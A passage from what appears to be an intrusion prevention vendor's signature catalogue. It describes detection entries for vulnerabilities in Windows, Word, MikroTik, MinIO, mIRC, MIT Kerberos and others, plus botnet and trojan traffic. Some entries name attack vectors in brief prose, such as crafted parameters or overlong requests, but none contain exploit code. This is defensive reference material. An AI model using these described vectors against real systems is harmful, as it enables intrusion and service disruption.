
Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

An attempt to exploit a spoofing vulnerability in Microsoft Windows was detected. Successful exploitation of this issue can result in execution of spoofed files.

Situation:

File-Exe_Microsoft_Windows_CryptoAPI_Spoofing_Vulnerability_CVE-2020-0601

References:

CVE-2020-0601
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0601

ms20-jan
http://technet.microsoft.com/security/bulletin/ms20-jan

Microsoft_Windows_Information_Disclosure_Vulnerability_CVE-2019-0703

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1143-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

An attempt to exploit an information disclosure vulnerability in Microsoft Windows was detected. Successful exploitation of this issue can result in information leakage that can be used to bypass ASLR.

Situation:

SMB-TCP_Microsoft_Windows_Information_Disclosure_Vulnerability_CVE-2019-0703

References:

CVE-2019-0703
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0703

ms19-mar
http://technet.microsoft.com/security/bulletin/ms19-mar

Microsoft_Windows_Integer_Overflow_Vulnerability_CVE-2019-0885

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1159-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Integer Overflow

Description:

There exists an integer overflow vulnerability in Microsoft Windows. Successful exploitation of this issue can result in remote code execution.

Situation:

File-OLE_Microsoft_Windows_Integer_Overflow_Vulnerability_CVE-2019-0885

References:

CVE-2019-0885
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0885

ms19-may
http://technet.microsoft.com/security/bulletin/ms19-may

Microsoft_Windows_Integer_Overflow_Vulnerability_CVE-2020-1301

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1256-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Integer Overflow

Description:

There exists an integer overflow vulnerability in Microsoft Windows. Successful exploitation of this issue can result in denial of service conditions.

Situation:

SMB-TCP_Microsoft_Windows_Integer_Overflow_Vulnerability_CVE-2020-1301

References:

CVE-2020-1301
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1301

ms20-jun
http://technet.microsoft.com/security/bulletin/ms20-jun

Microsoft_Windows_Integer_Underflow_Issue_Vulnerability_CVE-2019-0903

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1159-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There exists an integer underflow issue vulnerability in Microsoft Windows. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Binary_Microsoft_Windows_Integer_Underflow_Issue_Vulnerability_CVE-2019-0903

References:

CVE-2019-0903
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0903

ms19-may
http://technet.microsoft.com/security/bulletin/ms19-may

Microsoft_Windows_Memory_Corruption_Vulnerability_CVE-2020-0664

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Windows detected

Risk:

High

First detected in:

sgpkg-ips-1274-5242

Last changed:

sgpkg-ips-1370-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

An attempt to exploit a memory corruption vulnerability in Microsoft Windows was detected. Successful exploitation of this issue can result in remote code execution.

Situation:

LDAP_CS-Microsoft_Windows_Memory_Corruption_Vulnerability_CVE-2020-0664

References:

CVE-2020-0664
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0664

ms20-sep
http://technet.microsoft.com/security/bulletin/ms20-sep

Microsoft_Windows_Out_Of_Bounds_Vulnerability_CVE-2020-0609

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1215-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

An attempt to exploit an out-of-bounds vulnerability in Microsoft Windows was detected. Successful exploitation of this issue can result in remote code execution. This signature also covers the vulnerability CVE-2020-0610.

Situation:

Generic_UDP-Microsoft_Windows_Out_Of_Bounds_Vulnerability_CVE-2020-0609

References:

CVE-2020-0609
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0609

ms20-jan
http://technet.microsoft.com/security/bulletin/ms20-jan

Microsoft_Windows_Out_Of_Bound_Vulnerability_CVE-2020-1284

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1256-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There exists an out of bound vulnerability in Microsoft Windows. Successful exploitation of this issue can result in kernel memory disclosure.

Situation:

SMB-TCP_SS-Microsoft_Windows_Out_Of_Bound_Vulnerability_CVE-2020-1284

References:

CVE-2020-1284
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1284

ms20-jun
http://technet.microsoft.com/security/bulletin/ms20-jun

Microsoft_Windows_SMBv3_Remote_Code_Execution_Vulnerability_CVE-2020-0796

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Windows detected

Risk:

High

First detected in:

sgpkg-ips-1230-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

An attempt to exploit a remote code execution vulnerability in Microsoft Windows was detected. Successful exploitation of this issue can result in remote code execution. This situation also covers the vulnerability CVE-2020-1206.

Situation:

SMB-TCP_Microsoft_Windows_SMBv3_Remote_Code_Execution_Vulnerability_CVE-2020-0796

References:

CVE-2020-0796
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0796

ms20-mar
http://technet.microsoft.com/security/bulletin/ms20-mar

Microsoft_Word_Out_Of_Bound_Write_Vulnerability_CVE-2019-1201

About this vulnerability:

A vulnerability in Microsoft Word

Risk:

High

First detected in:

sgpkg-ips-1181-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Word

Type:

Malfunction

Description:

There exists an out of bound write vulnerability in Microsoft Word. Successful exploitation of this issue can result in remote code execution.

Situation:

File-OLE_Microsoft_Word_Out_Of_Bound_Write_Vulnerability_CVE-2019-1201

References:

CVE-2019-1201
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1201

ms19-aug
http://technet.microsoft.com/security/bulletin/ms19-aug

Microsys-PROMOTIC-Pmbase64decode-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsys Promotic

Risk:

High

First detected in:

sgpkg-ips-637-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PROMOTIC

Type:

Buffer Overflow

Description:

A stack-based buffer overflow vulnerability exists in Microsys's Promotic. The vulnerability is due to an insufficient boundary check on user-supplied data in the PmBase64Decode function. A remote, unauthenticated attacker can exploit this vulnerability by supplying a maliciously crafted base64 encoded string to the vulnerable application. Successful exploitation could lead to injection and execution of arbitrary code in the security context of the target application.

Situation:

HTTP_CSH-Microsys-PROMOTIC-Pmbase64decode-Buffer-Overflow

References:

CVE-2014-9205
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9205

Microweber-CMS-Local-File-Inclusion

About this vulnerability:	A vulnerability in Microweber.
Risk:	High
First detected in:	sgpkg-ips-1446-5242
Last changed:	sgpkg-ips-1446-5242
Platform:	Linux; Unix
Software:	Microweber
Type:	Input Validation
Description:	A vulnerability in Microweber, version 1.2.10, which allows remote attackers to upload any readable file from the operating system into the backups folder, allowing the attacker to read them. Additionally original files are deleted after uploading, as a result of that files can be lost.
Situation:	HTTP_CSU-Microweber-CMS-Local-File-Inclusion

Mida-Solutions-eFramework-ajaxreq.php-Command-Injection

About this vulnerability:

A vulnerability in Mida Solutions eFramework

Risk:

High

First detected in:

sgpkg-ips-1349-5242

Last changed:

sgpkg-ips-1349-5242

Platform:

Generic

Software:

Mida Solutions eFramework

Type:

Input Validation

Description:

There exists a vulnerability in Mida Solutions eFramework, versions 2.9.0 and before, which allows remote attackers to execute arbitrary commands via the PARAM parameter to ajaxreq.php, due to insufficient validation of user input.

Situation:

HTTP_CRL-Mida-Solutions-eFramework-ajaxreq.php-Command-Injection

References:

CVE-2020-15920
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15920

MikroTik-Router-OS-Buffer-Overflow-Vulnerability-CVE-2018-7445

About this vulnerability:

An attempt to exploit a vulnerability in MikroTik detected

Risk:

High

First detected in:

sgpkg-ips-1751-5242

Last changed:

sgpkg-ips-1751-5242

Platform:

Generic

Software:

MikroTik

Type:

Buffer Overflow

Description:

A buffer overflow was found in the MikroTik RouterOS SMB service when processing NetBIOS session request messages. Remote attackers with access to the service can exploit this vulnerability and gain code execution on the system. The overflow occurs before authentication takes place, so it is possible for an unauthenticated remote attacker to exploit it.

Situation:

Generic_CS-MikroTik-Router-OS-Buffer-Overflow-Vulnerability-CVE-2018-7445

References:

CVE-2018-7445
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7445

MikroTik-RouterOS-Authentication-Bypass

About this vulnerability:

A vulnerability in MikroTik RouterOS

Risk:

High

First detected in:

sgpkg-ips-1387-5242

Last changed:

sgpkg-ips-1387-5242

Platform:

Generic

Software:

MikroTik

Type:

Directory Traversal

Description:

There exists an authentication bypass vulnerability in MikroTik RouterOS. Successful exploitation could allow unauthenticated attackers to read arbitrary files.

Situation:

HTTP_CS-MikroTik-RouterOS-Authentication-Bypass
Generic_CS-MikroTik-RouterOS-Authentication-Bypass

References:

CVE-2018-14847
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14847

MineBridge-Trojan-Infection-Traffic

About this vulnerability:	MineBridge trojan infection traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1355-5242
Last changed:	sgpkg-ips-1355-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	MineBridge trojan infection traffic was detected.
Situation:	HTTP_CRL-MineBridge-Trojan-Infection-Traffic

Mini-Stream-Ripper-Buffer-Overflow

About this vulnerability:

A Mini-Stream Ripper Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-758-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP

Software:

Mini-Stream Ripper

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability Mini-Stream Ripper, version 3.0.1.1, which allows remote attackers to execute arbitrary code via a long entry in a .pls file.

Situation:

File-Text_Mini-Stream-Ripper-Buffer-Overflow

References:

CVE-2009-5109
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-5109

OSVDB-61341
http://www.osvdb.org/61341

MinIO-Information-Disclosure-Vulnerability-CVE-2023-28432

About this vulnerability:

An attempt to exploit a vulnerability in MinIO detected

Risk:

High

First detected in:

sgpkg-ips-1583-5242

Last changed:

sgpkg-ips-1865-5242

Platform:

Generic

Software:

MinIO

Type:

Insecure Configuration

Description:

MinIO is a multi-cloud object storage framework. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD, resulting in information disclosure. All users of distributed deployment are impacted.

Situation:

HTTP_CSU-Potential-MinIO-Information-Disclosure-Vulnerability-CVE-2023-28432
File-Text_MinIO-Information-Disclosure-Vulnerability-CVE-2023-28432

References:

CVE-2023-28432
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28432

Minishare-1.4.1-Buffer-Overflow

About this vulnerability:

Minishare 1.4.1 Buffer Overflow

Risk:

Moderate

First detected in:

sgpkg-ips-645-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Minishare Web Server

Type:

Buffer Overflow

Description:

A vulnerability exists in Minishare 1.4.1 and earlier that allows remote attackers to execute arbitrary code via a long HTTP GET request.

Situation:

HTTP_CS-Minishare-1.4.1-Buffer-Overflow

References:

CVE-2004-2271
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2271

BID-11620
http://www.securityfocus.com/bid/11620

OSVDB-11530
http://www.osvdb.org/11530

MiniUPnP-Denial-Of-Service

About this vulnerability:

A MiniUPnP Denial Of Service vulnerability.

Risk:

High

First detected in:

sgpkg-ips-702-5211

Last changed:

sgpkg-ips-1423-5242

Platform:

Generic

Software:

MiniUPnP

Type:

Input Validation

Description:

A vulnerability in MiniUPnP, versions before 1.4, which allows remote attackers to cause a denial of service condition via a crafted request that triggers a buffer over-read. This situation also covers Realtek buffer overflow vulnerability CVE-2021-35393.

Situation:

Generic_UDP-MiniUPnP-Denial-Of-Service

References:

CVE-2013-0229
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0229

BID-57607
http://www.securityfocus.com/bid/57607

MiniUPnP-Stack-Based-Buffer-Overflow

About this vulnerability:

A MiniUPnP Stack Based Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-702-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MiniUPnP

Type:

Buffer Overflow

Description:

A stack based buffer overflow vulnerability in MiniUPnP 1.0 which allows remote attackers to execute arbitrary code via a long quoted method.

Situation:

Generic_CS-MiniUPnP-Stack-Based-Buffer-Overflow

References:

CVE-2013-0230
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0230

BID-57608
http://www.securityfocus.com/bid/57608

Mirai-Botnet

About this vulnerability:	Mirai botnet
Risk:	High
First detected in:	sgpkg-ips-1010-5242
Last changed:	sgpkg-ips-1355-5242
Platform:	Generic
Software:	<os>
Type:	Code Injection
Description:	Mirai is a malicious botnet that infects Linux-based systems. Mirai spreads as a worm by attempting to break into systems accessible via Telnet and SSH that are susceptible to default password logins. The main focus of Mirai's monetization is massive distributed denial-of-service attacks in which compromised devices jointly attack innocuous victims. Mirai usually does not persist on the infected device, i.e., a hard power cycle will remove Mirai -- however, precaution should be taken to change passwords or deny Telnet/SSH access.
Situation:	Telnet_CS-Mirai-Botnet-C-And-C-Traffic Generic_CS-Mirai-Botnet-C-And-C-Traffic Generic_CS-Mirai-Botnet-C-And-C-Traffic-4 Generic_CS-Mirai-Botnet-C-And-C-Traffic-3 Generic_CS-Mirai-Botnet-C-And-C-Traffic-2

mIRC-IRC-URI-Protocol-Handler-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in mIRC

Risk:

High

First detected in:

sgpkg-ips-262-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

mIRC

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in mIRC. The vulnerability is due to insufficient input validation when handling irc:// protocol URIs. An exploitation may lead to arbitrary code exectution in the context of the current user.

Situation:

HTTP_SS-mIRC-IRC-URI-Protocol-Handler-Buffer-Overflow
File-Text_mIRC-IRC-URI-Protocol-Handler-Buffer-Overflow

References:

CVE-2003-1336
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1336

BID-8819
http://www.securityfocus.com/bid/8819

OSVDB-2665
http://www.osvdb.org/2665

mIRC-PRIVMSG-Message-Processing-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in mIRC

Risk:

Moderate

First detected in:

sgpkg-ips-173-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

mIRC

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the handling of the PRIVMSG command with an overly long prefix in mIRC. A successful exploit leads to a termination of the affected application or arbitrary code execution with the privileges of the currently logged in user.

Situation:

Generic_mIRC-PRIVMSG-Message-Processing-Buffer-Overflow

References:

CVE-2008-4449
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4449

BID-31552
http://www.securityfocus.com/bid/31552

OSVDB-48752
http://www.osvdb.org/48752

mIRC-URI-Handler-Remote-Code-Execution

About this vulnerability:

A vulnerability in mIRC

Risk:

Moderate

First detected in:

sgpkg-ips-1163-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

mIRC

Type:

Input Validation

Description:

There has been reported a remote code execution vulnerability in mIRC. This vulnerability can be exploited by opening a malicious web page.

Situation:

HTTP_SHS-mIRC-URI-Handler-Remote-Code-Execution
File-Text_mIRC-URI-Handler-Remote-Code-Execution

References:

CVE-2019-6453
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6453

MirrorBlast-Malware-Infection-Traffic

About this vulnerability:	MirrorBlast Malware infection traffic
Risk:	High
First detected in:	sgpkg-ips-1392-5242
Last changed:	sgpkg-ips-1392-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	MirrorBlast malware infection traffic was detected.
Situation:	HTTP_CS-MirrorBlast-Malware-Infection-Traffic

Mirth-Connect-Remote-Code-Execution-CVE-2023-43208

About this vulnerability:

A vulnerability in Mirth Connect

Risk:

High

First detected in:

sgpkg-ips-1676-5242

Last changed:

sgpkg-ips-1676-5242

Platform:

Generic

Software:

Mirth Connect

Type:

Malfunction

Description:

A remote code execution vulnerability has been reported in NextGen Healthcare Mirth Connect versions prior to 4.4.1. This vulnerability stems from the incomplete patching of CVE-2023-37679. Both vulnerabilities are due to insecure usage of XStream to unmarshall user-supplied XML.

Situation:

File-Text_Mirth-Connect-Remote-Code-Execution-CVE-2023-43208
File-TextId_Mirth-Connect-Remote-Code-Execution-CVE-2023-43208

References:

CVE-2023-43208
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-43208

MISC-BOOTP-Hardware-Address-Length-Overflow

About this vulnerability:

Buffer overflow in BOOTP daemon.

Risk:

High

First detected in:

sgpkg-ips-6-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

bootpd

Type:

Buffer Overflow

Description:

A BOOTP daemon shipped within many Unix systems contains a buffer overflow, which can be exploited to cause the bootp server to crash. It has also been confirmed that this vulnerability can be used to execute arbitrary commands on OpenBSD and BSDI platforms.

Situation:

BOOTP_Daemon-Hardware-Address-Length-Overflow

References:

CVE-1999-0798
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0798

Miscrosoft-Edge-Information-Disclosure-Vulnerability-CVE-2017-0017

About this vulnerability:

A vulnerability in Microsoft Edfe

Risk:

Moderate

First detected in:

sgpkg-ips-863-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a vulnerability in Microsoft Edge.

Situation:

File-Text_Microsoft-Edge-Information-Disclosure-Vulnerability-CVE-2017-0017

References:

CVE-2017-0017
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0017

MS17-006
http://technet.microsoft.com/security/bulletin/MS17-006

Miscrosoft-Edge-RCE-CVE-2017-0200

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-876-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a remote code execution vulnerability in Microsoft Edge. A successful exploitation could allow the attacker to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Edge-RCE-CVE-2017-0200

References:

CVE-2017-0200
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0200

ms17-apr
http://technet.microsoft.com/security/bulletin/ms17-apr

Miscrosoft-Office-RCE-CVE-2017-0199

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

Moderate

First detected in:

sgpkg-ips-876-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Office

Type:

Malfunction

Description:

There exists a remote code execution vulnerability in Microsoft Office. The vulnerability can be triggered with a specially crafted file. A succesfull exploitation can allow the attacker to take control of the affected system.

Situation:

File-OLE_Microsoft-Office-RCE-CVE-2017-0199
File-RTF_Microsoft-Office-RCE-CVE-2017-0199
File-TextId_Microsoft-Office-RCE-CVE-2017-0199

References:

CVE-2017-0199
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0199

ms17-apr
http://technet.microsoft.com/security/bulletin/ms17-apr

Miscrosoft-Outlook-RCE-CVE-2017-0106

About this vulnerability:

A vulnerability in Microsoft Outlook

Risk:

Moderate

First detected in:

sgpkg-ips-876-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Outlook

Type:

Malfunction

Description:

There exists a remote code execution vulnerability in Microsoft Outlook. The vulnerability can be triggered with a specially crafted email. A succesfull exploitation can allow the attacker to take control of the affected system.

Situation:

File-OLE_Microsoft-Outlook-RCE-CVE-2017-0106

References:

CVE-2017-0106
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0106

ms17-apr
http://technet.microsoft.com/security/bulletin/ms17-apr

MIT-Kerberos-5-Build_Principal_va-Denial-Of-Service

About this vulnerability:

A vulnerability in MIT Kerberos 5

Risk:

Moderate

First detected in:

sgpkg-ips-708-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MIT Kerberos 5

Type:

Malfunction

Description:

A parser vulnerability can be exploited to cause a denial of service by sending a crafted packet containing a null byte in the realm name.

Situation:

Generic_UDP-MIT-Kerberos-5-Build_Principal_va-Denial-Of-Service
Generic_CS-MIT-Kerberos-5-Build_Principal_va-Denial-Of-Service

References:

CVE-2015-2697
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2697

MIT-Kerberos-5-Invalid-RFC-1964-Token-Denial-of-Service

About this vulnerability:

An MIT Kerberos 5 Invalid RFC 1964 Token Denial of Service vulnerability

Risk:

High

First detected in:

sgpkg-ips-1001-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MIT Kerberos 5

Type:

Null Pointer Dereference

Description:

A vulnerability in MIT Kerberos 5 which allows remote attackers to cause a denial of service condition by injecting packets into a legitimate GSSAPI session, due to a NULL pointer dereference when Kerberos processes RFC 1964 tokens with an RFC 4121 context.

Situation:

Generic_UDP-MIT-Kerberos-5-Invalid-RFC-1964-Token-Denial-of-Service
Generic_CS-MIT-Kerberos-5-Invalid-RFC-1964-Token-Denial-of-Service

References:

CVE-2014-4342
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4342

MIT-Kerberos-5-Kadmind-Kadm5_Policy-Denial-Of-Service

About this vulnerability:

A vulnerability in MIT Kerberos 5

Risk:

High

First detected in:

sgpkg-ips-731-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MIT Kerberos 5

Type:

Malfunction

Description:

There exists a denial-of-service vulnerability in the MIT Kerberos 5 kadmind service. A rmeote attacker can use this to terminate the kadmin service.

Situation:

Generic_CS-MIT-Kerberos-5-Kadmind-Kadm5_Policy-Denial-Of-Service

References:

CVE-2015-8630
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8630

MIT-Kerberos-5-Kadmind-Null-Pointer-Dereference

About this vulnerability:

A vulnerability in MIT Kerberos 5

Risk:

High

First detected in:

sgpkg-ips-768-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MIT Kerberos 5

Type:

Malfunction

Description:

There exists a denial-of-service vulnerability in the MIT Kerberos 5 kadmind service.

Situation:

Generic_CS-MIT-Kerberos-5-Kadmind-Null-Pointer-Dereference

References:

CVE-2016-3119
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3119

MIT-Kerberos-5-KDC-Null-Pointer-Dereference

About this vulnerability:

An MIT Kerberos 5 KDC Null Pointer Dereference vulnerability

Risk:

High

First detected in:

sgpkg-ips-1000-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MIT Kerberos 5

Type:

Null Pointer Dereference

Description:

A vulnerability in MIT Kerberos 5 KDC which allows remote attackers to create a denial of service condition by sending a specially crafted packet to the target server, due to a NULL pointer dereference in the pkinit_check_kdc_pkid function while processing malformed requests.

Situation:

Generic_CS-MIT-Kerberos-5-KDC-Null-Pointer-Dereference

References:

CVE-2013-1415
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1415

MIT-Kerberos-5-KDC-prep_reprocess_req-Null-Pointer-Dereference

About this vulnerability:

An MIT Kerberos 5 KDC prep_reprocess_req NULL Pointer Dereference vulnerability

Risk:

High

First detected in:

sgpkg-ips-1001-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MIT Kerberos 5

Type:

Malfunction

Description:

A vulnerability in MIT Kerberos 5 which allows remote attackers to cause a denial of service condition by sendig specially crafted packets to the target server, due to the server using a NULL pointer in the prep_reporocess_req function while processing and unusual but valid TGS-REQ.

Situation:

Generic_UDP-MIT-Kerberos-5-KDC-prep_reprocess_req-Null-Pointer-Dereference

References:

CVE-2013-1416
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1416

MIT-Kerberos-5-KDC-TCP-Handling-Denial-of-Service

About this vulnerability:

An MIT Kerberos 5 KDC TCP Handling Denial of Service vulnerability

Risk:

High

First detected in:

sgpkg-ips-1000-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MIT Kerberos 5

Type:

Malfunction

Description:

A vulnerability in MIT Kerberos 5 KDC which allows remote attackers to create a denial of service condition, or possibly excute arbitrary code, due to improper handling of an error case that results in heap corruption.

Situation:

Generic_CS-MIT-Kerberos-5-KDC-TCP-Handling-Denial-of-Service

References:

CVE-2005-1174
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1174

MIT-Kerberos-5-kpasswd-UDP-Ping-Pong-Denial-Of-Service

About this vulnerability:

An MIT Kerberos 5 kpasswd UDP Ping-Pong Denial Of Service vulnerability

Risk:

High

First detected in:

sgpkg-ips-1001-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MIT Kerberos 5

Type:

Malfunction

Description:

A vulnerability in MIT Kerberos 5 which allows remote attackers to cause a denial of service condition by spoofing the IP address and UDP port value on a malformed kpasswd request sent to the vulnerable server to that of the server itself, due to the way the kadmin servers respond to malformed kpasswd UDP request packet.

Situation:

Generic_UDP-MIT-Kerberos-5-kpasswd-UDP-Ping-Pong-Denial-Of-Service

References:

CVE-2002-2443
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2443

MIT-Kerberos-5-Recvauth-Invalid-Memory-Access

About this vulnerability:

A vulnerability in MIT Kerberos

Risk:

High

First detected in:

sgpkg-ips-634-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MIT Kerberos

Type:

Malfunction

Description:

A denial of service vulnerability exists in MIT Kerberos 5. The vulnerability occurs when recvauth_common() calls krb5_read_message() to receive and process a crafted message causing it to return an invalid string that later causes a NULL pointer dereference or an attempt to read beyond the end of a buffer. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted message to an application, such as klogind, that use the krb5_recvauth() API. Successful exploitation will cause the vulnerable application process to terminate.

Situation:

Generic_CS-MIT-Kerberos-5-Recvauth-Invalid-Memory-Access

References:

CVE-2014-5355
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5355

OSVDB-118567
http://www.osvdb.org/118567

MIT-Kerberos-5-SPNEGO-Acceptor-acc_ctx_cont-Denial-of-Service

About this vulnerability:

An MIT Kerberos 5 SPNEGO Acceptor acc_ctx_cont Denial of Service vulnerability

Risk:

High

First detected in:

sgpkg-ips-1000-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MIT Kerberos 5

Type:

Null Pointer Dereference

Description:

A vulnerability in MIT Kerberos 5 which allows remote attackers to cause a denial of service condition by sending an empty token as the second or later context token during SPNEGO negotiation.

Situation:

Generic_CS-MIT-Kerberos-5-SPNEGO-Acceptor-acc_ctx_cont-Denial-of-Service

References:

CVE-2014-4344
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4344

MIT-Kerberos-Asn1DecodeGeneraltime-Uninitialized-Pointer-Reference

About this vulnerability:

A vulnerability in MIT Kerberos

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MIT Kerberos

Type:

Malfunction

Description:

A memory corruption vulnerability exists in MIT Kerberos server. The vulnerability is due to the release of an uninitialized pointer in the ASN.1 decoder while decoding maliciously crafted data. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted RPC request to the kadmind daemon. In an attack aiming for denial of service, the Kerberos kadmind service will terminate abnormally as a result of an attack. The Kerberos administration functionality remains unavailable until the service is restarted. In a more sophisticated attack scenario, where the malicious user is successful in injecting and executing supplied code, the behaviour of the system is dependent on the nature the injected code. Any code injected into the vulnerable component would execute in the security context of the service process, which may be system/root level.

Situation:

Generic_UDP-MIT-KerberosAsn1_Decode_Generaltime-Uninitialized-Pointer-Reference

References:

CVE-2009-0846
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0846

BID-34409
http://www.securityfocus.com/bid/34409

MIT-Kerberos-Kadmind-Rename-Principal-Buffer-Overflow

About this vulnerability:

A vulnerability in MIT Kerberos

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MIT Kerberos

Type:

Buffer Overflow

Description:

There is a stack buffer overflow vulnerability in the Kerberos Administration Server (kadmind). The vulnerability is due to insufficient boundary check while handling requests to rename principals. A remote authenticated attacker can exploit this vulnerability by sending a specially crafted RPC request to the kadmind daemon. Successful exploitation may lead to execution of arbitrary code with root privileges on the target host. In an attack aiming for denial of service, the Kerberos kadmind service will terminate abnormally as a result of an attack. The Kerberos administration functionality remains unavailable until the service is restarted. In a more sophisticated attack scenario, where the malicious user is successful in injecting and executing supplied code, the behaviour of the system is dependent on the nature the injected code. Any code injected into the vulnerable component would execute in the security context of the service process, which may be system/root level.

Situation:

